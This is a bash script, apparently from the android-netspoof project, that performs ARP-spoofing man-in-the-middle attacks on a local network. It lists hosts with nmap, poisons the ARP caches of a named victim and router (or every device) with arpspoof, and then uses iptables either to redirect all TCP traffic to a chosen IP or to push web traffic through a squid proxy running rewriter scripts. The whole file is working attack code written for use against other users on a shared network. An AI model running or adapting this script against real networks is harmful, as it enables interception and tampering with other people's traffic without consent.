~w-shackleton/android-netspoof/debimg-trunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
#!/bin/bash

# Wifi interface. May need changing
[ "$WLAN" == "" ] && WLAN=eth0
# WLAN=eth0

# Detect a few settings

[ "$IP" == "" ] && IP=$(ifconfig $WLAN | grep "inet addr" | sed 's/[^:]*:\([^ ]*\) .*/\1/')
echo Current Wifi IP: $IP

[ "$SUBNET" == "" ] && SUBNET=$(route -n | grep $WLAN | awk '{print $1}' | head -n1)
echo Current subnet: $SUBNET

[ "$MASK" == "" ] && MASK=$(ifconfig $WLAN | grep Mask | sed 's/.*Mask:\([^ ]*\)/\1/')
echo Subnet mask: $MASK
if [ "$SHORTMASK" == "" ]
then
	SHORTMASK=24
	[ "$MASK" == "255.255.255.255" ] && SHORTMASK=31
	[ "$MASK" == "255.255.0.0" ] && SHORTMASK=16
	[ "$MASK" == "255.0.0.0" ] && SHORTMASK=8
fi

if [ "$#" -eq 0 ]
then
	echo "Listing hosts on subnet"
	echo "To actually run a spoof, first specify the IP addresses of the victim and the router as arguments."
	echo "Eg. $0 192.168.1.105 192.168.1.1"
	echo "To run for all devices, use '*' as the first argument."
	echo " "
	echo "NOTE: The list below sometimes doesn't actually show anything for some reason."
	nmap -sP $SUBNET/$SHORTMASK | grep "appears to be up"
	exit
fi

if [ "$#" -eq 1 ]
then
	echo "Please specify router & pc as arguments"
	exit 1
fi

if [ "$#" -eq 2 ]
then
	echo "Modes available:"
	echo "	0 - Arpspoof only"
	echo "	1 - redirect to ip address (next arg)"
	echo "	2 - Transform script mode (default is Upside down mode)"
	echo "	3 - Transform script multi mode (specify shell script chaining as arg)"
	exit 1
fi

MODE="$3"
OPT1="$4"
case "$MODE" in
	"0")
		;;
	"1")
		if [ "$#" -eq 3 ]
		then
			echo "No IP specified - using kittenwar"
			OPT1="205.196.209.62"
		fi
		;;
	"2")
		if [ "$#" -eq 3 ]
		then
			echo "No script in /rewriters specified, using flip.pl"
			echo "Specify a script after the option number to use a custom one."
			echo "NOTE: If an invalid script is specified, nothing will happen!"
			OPT1="flip.pl"
		fi
		;;
	"3")
		if [ "$#" -eq 3 ]
		then
			echo "No scripts in /rewriters specified, using flip.pl"
			OPT1="/rewriters/flip.pl"
		fi
		;;
	* )
		echo "Please specify a valid option"
		exit 1
		;;
esac


if [ "$1" = "all" ]
then
	echo "Starting ARP Spoofing for all devices"
	arpspoof -i $WLAN "$2" > /dev/null &
	ARP1="$!"
elif [ "$1" == "none" ]
then
	echo "Not arpspoofing at all."
else
	echo "Starting ARP Spoofing"
	arpspoof -i $WLAN -t "$1" "$2" > /dev/null &
	ARP1="$!"
	arpspoof -i $WLAN -t "$2" "$1" > /dev/null &
	ARP2="$!"
fi

case "$MODE" in
	"1")
		echo "Setting iptables"
		iptables -t nat -A PREROUTING -p tcp -j DNAT --to-destination $OPT1
		;;
	"2")
		rm -f /usr/local/bin/rewrite
		ln -s /rewriters/$OPT1 /usr/local/bin/rewrite
		/etc/init.d/squid start
		/etc/init.d/lighttpd start
		iptables -P FORWARD ACCEPT # Android 4.0 requires this
		iptables -t nat -A POSTROUTING -j MASQUERADE
		iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
		;;
	"3")
		rm -f /usr/local/bin/rewrite
		# I'm So Meta, Even This Acronym
		echo "#!/bin/sh" > /usr/local/bin/rewrite
		echo "$OPT1" >> /usr/local/bin/rewrite
		chmod a+x /usr/local/bin/rewrite
		/etc/init.d/squid start
		/etc/init.d/lighttpd start
		iptables -P FORWARD ACCEPT # Android 4.0 requires this
		iptables -t nat -A POSTROUTING -j MASQUERADE
		iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
		;;
esac

# Wait for finish
read

kill $ARP1 2>/dev/null
kill $ARP2 2>/dev/null

# Stop stuff
case "$MODE" in
	"1")
		echo "Unsetting iptables"
		iptables -t nat -D PREROUTING -p tcp -j DNAT --to-destination $OPT1
		;;
	"2")
		iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
		iptables -t nat -D POSTROUTING -j MASQUERADE
		/etc/init.d/squid stop
		/etc/init.d/lighttpd stop
		spoof-clean
		;;
	"3")
		iptables -t nat -D PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 3128
		iptables -t nat -D POSTROUTING -j MASQUERADE
		/etc/init.d/squid stop
		/etc/init.d/lighttpd stop
		spoof-clean
		;;
esac


wait